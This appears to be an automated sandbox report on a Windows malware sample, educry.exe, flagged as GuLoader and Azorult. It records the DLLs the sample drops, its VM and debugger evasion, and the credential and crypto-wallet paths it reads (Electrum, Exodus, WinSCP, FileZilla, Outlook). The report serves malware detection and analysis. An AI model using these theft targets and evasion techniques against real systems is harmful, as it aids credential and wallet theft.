Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: educry.exe, 00000001.00000003.249950826.000000001F400000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: educry.exe, 00000001.00000003.250454038.000000001F468000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: educry.exe, 00000001.00000003.245146609.000000001EA34000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: educry.exe, 00000001.00000003.250142825.000000001F414000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: educry.exe, 00000001.00000003.250262723.000000001F424000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: educry.exe, 00000001.00000003.250142825.000000001F414000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: educry.exe, 00000001.00000003.245831740.000000001EA34000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: educry.exe, 00000001.00000003.249784765.000000001F3DC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: educry.exe, 00000001.00000003.250497008.000000001F488000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: educry.exe, 00000001.00000003.249784765.000000001F3DC000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: educry.exe, 00000001.00000003.249784765.000000001F3DC000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: educry.exe, 00000001.00000003.244768131.000000001EA44000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: educry.exe, 00000001.00000003.250537020.000000001F49C000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr

            Data Obfuscation:

            Yara detected GuLoader
            Source: Yara match File source: 00000001.00000002.263140364.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: educry.exe PID: 6624, type: MEMORY
            Source: Yara match File source: Process Memory Space: educry.exe PID: 6588, type: MEMORY
            Binary contains a suspicious time stamp
            Source: initial sample Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
            Yara detected VB6 Downloader Generic
            Source: Yara match File source: Process Memory Space: educry.exe PID: 6624, type: MEMORY
            Source: Yara match File source: Process Memory Space: educry.exe PID: 6588, type: MEMORY
            Source: C:\Users\user\Desktop\educry.exe Code function: 0_2_0040420A push ecx; ret 0_2_00404216
            Source: C:\Users\user\Desktop\educry.exe Code function: 0_2_00404E14 push ebp; retf 0_2_00404E84
            Source: C:\Users\user\Desktop\educry.exe Code function: 0_2_004055AB push cs; ret 0_2_004055B9
            Source: C:\Users\user\Desktop\educry.exe Code function: 0_2_023A0047 push ds; ret 0_2_023A0051
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l2-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-time-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-runtime-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\nss3.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processenvironment-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-convert-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\nssdbm3.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\mozglue.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l1-2-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-private-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-profile-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-rtlsupport-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\freebl3.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-libraryloader-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\vcruntime140.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-interlocked-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-conio-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-handle-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-datetime-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-synch-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-namedpipe-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-util-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-locale-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\msvcp140.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-console-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\ucrtbase.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-localization-l1-2-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processthreads-l1-1-1.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-errorhandling-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\softokn3.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-process-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-debug-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-utility-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-timezone-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-math-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-environment-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processthreads-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-memory-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-multibyte-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-filesystem-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-stdio-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe File created: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-sysinfo-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Contains functionality to detect hardware virtualization (CPUID execution measurement)
            Source: C:\Users\user\Desktop\educry.exe Code function: 0_2_023A323D 0_2_023A323D
            Tries to detect Any.run
            Source: C:\Users\user\Desktop\educry.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\educry.exe File opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: educry.exe, educry.exe, 00000001.00000002.263140364.0000000000560000.00000040.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Users\user\Desktop\educry.exe Code function: 0_2_023A323D rdtsc 0_2_023A323D
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l2-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-handle-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-datetime-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-namedpipe-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-synch-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-time-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-util-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-runtime-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-locale-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-console-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processenvironment-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-localization-l1-2-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-convert-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\nssdbm3.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processthreads-l1-1-1.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-file-l1-2-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-private-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\softokn3.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-profile-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-errorhandling-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-process-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-debug-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-utility-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-rtlsupport-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-timezone-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\freebl3.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-libraryloader-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-math-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-environment-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-processthreads-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-memory-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-multibyte-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-filesystem-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-interlocked-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-stdio-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-core-sysinfo-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAAF81C1\api-ms-win-crt-conio-l1-1-0.dll
            Source: C:\Users\user\Desktop\educry.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\educry.exe TID: 6988 Thread sleep count: 125 > 30
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
            Source: educry.exe, 00000001.00000003.254168601.0000000000862000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
            Source: educry.exe, educry.exe, 00000001.00000002.263140364.0000000000560000.00000040.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
            Source: educry.exe, 00000001.00000003.254168601.0000000000862000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWface
            Source: educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
            Source: educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp Binary or memory string: vmicvss
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V Data Exchange Service
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V Guest Service Interface
            Source: educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmp; Binary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\educry.exe; Process information queried: ProcessInformation

            Anti Debugging:

            Contains functionality to hide a thread from the debugger
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A020C NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000 (0_2_023A020C)
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\educry.exe; Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\educry.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A323D rdtsc (0_2_023A323D)
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A1A7C mov eax, dword ptr fs:[00000030h] (0_2_023A1A7C)
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A1267 mov eax, dword ptr fs:[00000030h] (0_2_023A1267)
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A3458 mov eax, dword ptr fs:[00000030h] (0_2_023A3458)
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A3047 mov eax, dword ptr fs:[00000030h] (0_2_023A3047)
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A1291 mov eax, dword ptr fs:[00000030h] (0_2_023A1291)
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A34DE mov eax, dword ptr fs:[00000030h] (0_2_023A34DE)
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A3538 mov eax, dword ptr fs:[00000030h] (0_2_023A3538)
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A0D14 mov eax, dword ptr fs:[00000030h] (0_2_023A0D14)
            Source: C:\Users\user\Desktop\educry.exe; Code function: 0_2_023A2D64 mov eax, dword ptr fs:[00000030h] (0_2_023A2D64)
            Source: C:\Users\user\Desktop\educry.exe; Process created: C:\Users\user\Desktop\educry.exe 'C:\Users\user\Desktop\educry.exe'
            Source: C:\Users\user\Desktop\educry.exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\Desktop\educry.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected Azorult
            Source: Yara match; File source: 00000001.00000003.260334364.000000001E06C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: educry.exe PID: 6624, type: MEMORY
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmp; String found in binary or memory: %appdata%\Electrum\wallets\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmp; String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmp; String found in binary or memory: %APPDATA%\Exodus\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmp; String found in binary or memory: %APPDATA%\Ethereum\keystore\
            Source: educry.exe, 00000001.00000003.262136234.000000001E6F0000.00000004.00000001.sdmp; String found in binary or memory: %appdata%\Electrum-LTC\wallets\
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Users\user\Desktop\educry.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\educry.exe; File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Users\user\Desktop\educry.exe; File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
            Tries to steal Mail credentials (via file access)
            Source: C:\Users\user\Desktop\educry.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

            Mitre Att&ck Matrix

            Techniques are listed per tactic column (numbers after a technique are carried over from the original matrix):

            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron
            Persistence: DLL Side-Loading 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
            Privilege Escalation: Process Injection 11; DLL Side-Loading 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script
            Defense Evasion: Virtualization/Sandbox Evasion 22; Process Injection 11; Obfuscated Files or Information 1; Timestomp 1; DLL Side-Loading 1
            Credential Access: OS Credential Dumping 1; Credentials in Registry 2; Credentials In Files 1; NTDS; LSA Secrets
            Discovery: Security Software Discovery 521; Virtualization/Sandbox Evasion 22; Process Discovery 11; Remote System Discovery 1; System Information Discovery 123
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
            Collection: Email Collection 1; Archive Collected Data 1; Data from Local System 2; Input Capture; Keylogging
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
            Command and Control: Encrypted Channel 1; Non-Application Layer Protocol 2; Application Layer Protocol 12; Protocol Impersonation; Fallback Channels
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings

            Behavior Graph


            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi